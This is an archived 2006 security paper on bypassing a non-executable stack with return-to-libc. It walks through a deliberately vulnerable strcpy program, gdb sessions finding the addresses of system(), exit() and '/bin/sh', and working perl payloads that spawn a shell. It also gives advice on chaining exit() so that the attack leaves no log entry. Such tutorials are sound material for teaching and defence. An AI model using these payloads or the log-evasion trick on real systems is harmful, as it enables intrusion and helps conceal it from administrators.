Bypassing non-executable-stack during Exploitation (return-to-libc)

EDB-ID:

13204

CVE:

N/A


Author:

c0ntex

Type:

papers


Platform:

Multiple

Date:

2006-04-08


		Bypassing non-executable-stack during exploitation using return-to-libc
				by c0ntex | c0ntex[at]open-security.org
					www.open-security.org
		-----------------------------------------------------------------------


Returning to libc is a method of exploiting a buffer overflow on a system that has a non-executable stack, it is very
similar to a standard buffer overflow, in that the return address is changed to point at a new location that we can
control. However since no executable code is allowed on the stack we can't just tag in shellcode.  

This is the reason we use the return into libc trick and utilise a function provided by the library. We still overwrite
the return address with one of a function in libc, pass it the correct arguments and have that execute for us. Since
these functions do not reside on the stack, we can bypass the stack protection and execute code.

In the following example I will use the system() function, a generic return argument and a command argument, "/bin/sh",
and as no shellcode is required to use this method, it is also a very suitable trick for overflows where buffer space
is a real issue.

How does the technique look on the stack - a basic view will be something similar to this:


[-] Buffer overflow smashing EIP and jumping forward to shellcode

				                    1		          2
		|-------------------|-----------|------------|---------------------------|
		|             AAAAAAAAAAAA      |    RET     |        SHELLCODE          |
		|-------------------|-----------|------------|---------------------------|
		       args              EBP         EIP


[-] Buffer overflow doing return-to-libc and executing system function

				                    1	          2	             3
		|-------------------------------|------------|--------------|------------|
		|            buffer             |   system   |   fake_ret   |   /bin/sh  |
		|-------------------------------|------------|--------------|------------|
		       args              EBP         EIP


Now that we know what we need to achieve, let's compile the vulnerable application and run it.


/* retlib.c */
#include <stdio.h>
int main(int argc, char **argv)
{
	char buff[5];

	if(argc != 2) {
		puts("Need an argument!");
		_exit(1);
	}

	printf("Exploiting via returnig into libc function\n");
	strcpy(buff, argv[1]);
	printf("\nYou typed [%s]\n\n", buff);

	return(0);
}


-bash-2.05b$ ./retlib AAAAAAAAAA
Exploiting via returning into libc function

You typed [AAAAAAAAAA]

-bash-2.05b$ ./retlib `perl -e 'print "A" x 30'`

Exploiting via returning into libc function

You typed [AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]

Segmentation fault (core dumped)
-bash-2.05b$ gdb -q -c ./retlib.core
Core was generated by `retlib'.
Program terminated with signal 11, Segmentation fault.
#0  0x08004141 in ?? ()
(gdb)

By adding another two bytes to the buffer we will overwrite the return address completely:

-bash-2.05b$ ./retlib `perl -e 'print "A" x 32'`
Exploiting via returning into libc function

You typed [AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]

Segmentation fault (core dumped)
-bash-2.05b$ gdb -q -c ./retlib.core
Core was generated by `retlib'.
Program terminated with signal 11, Segmentation fault.
#0  0x41414141 in ?? ()
(gdb) q
-bash-2.05b$

RET overwrite buffer size: 32

So we know the buffer length we need to use, next we need to find the address of a library function that we want to 
execute and have perform the job of owning this application.

-bash-2.05b$ gdb -q ./retlib
(no debugging symbols found)...(gdb)
(gdb) b main
Breakpoint 1 at 0x804859e
(gdb) r
Starting program: /home/c0ntex/retlib
(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 1, 0x0804859e in main ()
(gdb) p system
$1 = {<text variable, no debug info>} 0x28085260 <system>
(gdb) q
The program is running.  Exit anyway? (y or n) y
-bash-2.05b$

System address: 0x28085260

We can see the address for system is at 0x28085260, that will be used to overwrite the return address, meaning when
the strcpy overflow triggers and the function returns, retlib will return to this address and execute system with the
arguments we supply to it.

The first argument will be that of /bin/sh, having system spawn a shell for us. You can either search the memory for
the string or you can add one to an environment variable, the latter is easiest and shown here.

One thing to note is you need to make sure that you drop the SHELL= part as this will royally screw things up. Drop
back into gdb and find the address of the string "/bin/sh"

-bash-2.05b$ gdb -q ./retlib
(no debugging symbols found)...(gdb)
(gdb) b main
Breakpoint 1 at 0x804859e
(gdb) r
Starting program: /home/c0ntex/retlib
(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 1, 0x0804859e in main ()
(gdb) x/s 0xbfbffd9b
0xbfbffd9b:      "BLOCKSIZE=K"
(gdb)
0xbfbffda7:      "TERM=xterm"
(gdb)
0xbfbffdb2:      "PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin:/usr/X11R6/bin:/home/c0ntex/bin"
(gdb)
0xbfbffe1f:      "SHELL=/bin/sh"
(gdb) x/s 0xbfbffe25
0xbfbffe25:      "/bin/sh"
(gdb) q
The program is running.  Exit anyway? (y or n) y
-bash-2.05b$


Great, so we have all the information we need and the final buffer will look like the following:

	EIP smash			= 32 - 4 = 28  (due to padding)
	system()			= 0x28085260
	system() return address		= SEXY (word)
	/bin/sh				= 0xbfbffe25


		|-------------------------------|-------------------|--------------|----------------|
		|            28 A's             |    0x28085260     |      SEXY    |    0xbfbffe25  |
		|-------------------------------|-------------------|--------------|----------------|
			   args             EBP           EIP


Remember that things are pushed onto the stack in reverse, as such, the return address for system will be before the
address of our shell, once the shell exits the process will jump to SEXY, which, to save having a log entry should
call exit() and cleanly terminate.


Putting that together, we whip up our command line argument:

retlib `perl -e 'printf "A" x 28 . "\x60\x52\x08\x28SEXY\x25\xfe\xbf\xbf";'`

lets give it a try :-)

-bash-2.05b$ ./retlib `perl -e 'printf "A" x 28 . "\x60\x52\x08\x28SEXY\x25\xfe\xbf\xbf";'`
Exploiting via returning into libc function

You typed [AAAAAAAAAAAAAAAAAAAAAAAAAAAA`(SEXY%þ¿¿]

=/home/c0ntex: not found
Segmentation fault (core dumped)
-bash-2.05b$ 


Hmm, something went wrong, open it up in gdb and verify the location of SHELL, it seems to have changed


-bash-2.05b$ gdb -c ./retlib.core
GNU gdb 5.2.1 (FreeBSD)
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-undermydesk-freebsd".
Core was generated by `retlib'.
Program terminated with signal 11, Segmentation fault.
#0  0x59584553 in ?? ()
(gdb) x/s 0xbfbffe25
0xbfbffe25:      "ME=/home/c0ntex"
(gdb) x/s 0xbfbffce8
0xbfbffce8:      "/bin/sh"
(gdb) q
-bash-2.05b$ ./retlib `perl -e 'printf "A" x 28 . "\x60\x52\x08\x28SEXY\xe8\xfc\xbf\xbf";'`

Exploiting via returning into libc function

You typed [AAAAAAAAAAAAAAAAAAAAAAAAAAAA`(SEXYèü¿¿]

$ ps -ef
  PID  TT  STAT      TIME COMMAND
  563  p0  Ss     0:00.92  -bash (bash)
  956  p0  S      0:00.02  ./retlib AAAAAAAAAAAAAAAAAAAAAAAAAAAA`R\b(SEXY\M-h\M-|\M-?\M-?
  957  p0  S      0:00.01  sh -c /bin/sh
  958  p0  S      0:00.02  /bin/sh
  959  p0  R+     0:00.01  ps -ef
$
Segmentation fault (core dumped)
-bash-2.05b$

On my FreeBSD box, the above core dump will be logged in /var/adm/messages, and an administrator will be able to
tell that someone has been trying to exploit a binary

Apr 11 12:25:48 badass kernel: pid 976 (retlib), uid 1002: exited on signal 11 (core dumped)

If you want to remain stealth it is advised to change the return address of SEXY to the libc address of exit(), so
when you quit there won't be any log of your activity.

-bash-2.05b$ gdb -q ./retlib
(no debugging symbols found)...(gdb)
(gdb) b main
Breakpoint 1 at 0x804859e
(gdb) r
Starting program: /home/c0ntex/retlib
(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 1, 0x0804859e in main ()
(gdb) p exit
$1 = {<text variable, no debug info>} 0x281130d0 <exit>
(gdb) q
The program is running.  Exit anyway? (y or n) y
-bash-2.05b$ ./retlib `perl -e 'printf "A" x 28 . "\x60\x52\x08\x28\xd0\x30\x11\x28\xe8\xfc\xbf\xbf";'`
Exploiting via returnig into libc function

You typed [AAAAAAAAAAAAAAAAAAAAAAAAAAAA`(Ð0(èü¿¿]

$ exit
-bash-2.05b$

There, this time it was clean the function exited cleanly and did not leave a log entry behind. As you might have
guessed from tagging exit() into the argument, it is possible to string multiple function calls together by
creating your own stack frames. This process is well documented in a phrack article by Negral in his phrack document
http://www.phrack.org/phrack/58/p58-0x04 and is useful for port binding and many other tricks.

Protecting against return-to-libc and other attacks?

Not really, but there are quite a lot of methods being used to help increase the defense against this form of attack
that make it much more difficult to perform in any consistant manner, ranging from core Kernel to compiler protection
mechanisms.

Some of the more common protection schemes being used are stack randomization, library randomization, GOT and PLT
seperation, removal of executable memory regions and stack canary values. Each method brings with it a degree of
extra protection, making it much more difficult to execute code after overflowing some buffer on the stack or heap.

Some applications developed to defend against buffer overflows and return-to-"something" attacks are:

	PaX
	ProPolice
	StackGuard
	StachShield

Though as natural progress evolves, attackers too become smarter and develop new methods of breaking that protection,
these methods include but are not limited to brute forcing, return to GOT / PLT, canary replay and memory leaking.

For instance, during a test on OpenBSD 3.6 I was able to brute force the address of a libc function by repeatedly
using the same function address, however it took me a long time to hit that same address and as such this method
is not robust enough to use for a stable exploit. It also creates thousands of repeated log entries and generates
a vast amount of traffic meaning that ID/PS and administrators will know straight off that something evil is
happening on the network.

Using the above protection methods does not stop attacks against programming mistakes but it certainly makes it much
harder to be successful and as such, each solution will prove better than nothing at all.



EOF

# milw0rm.com [2006-04-08]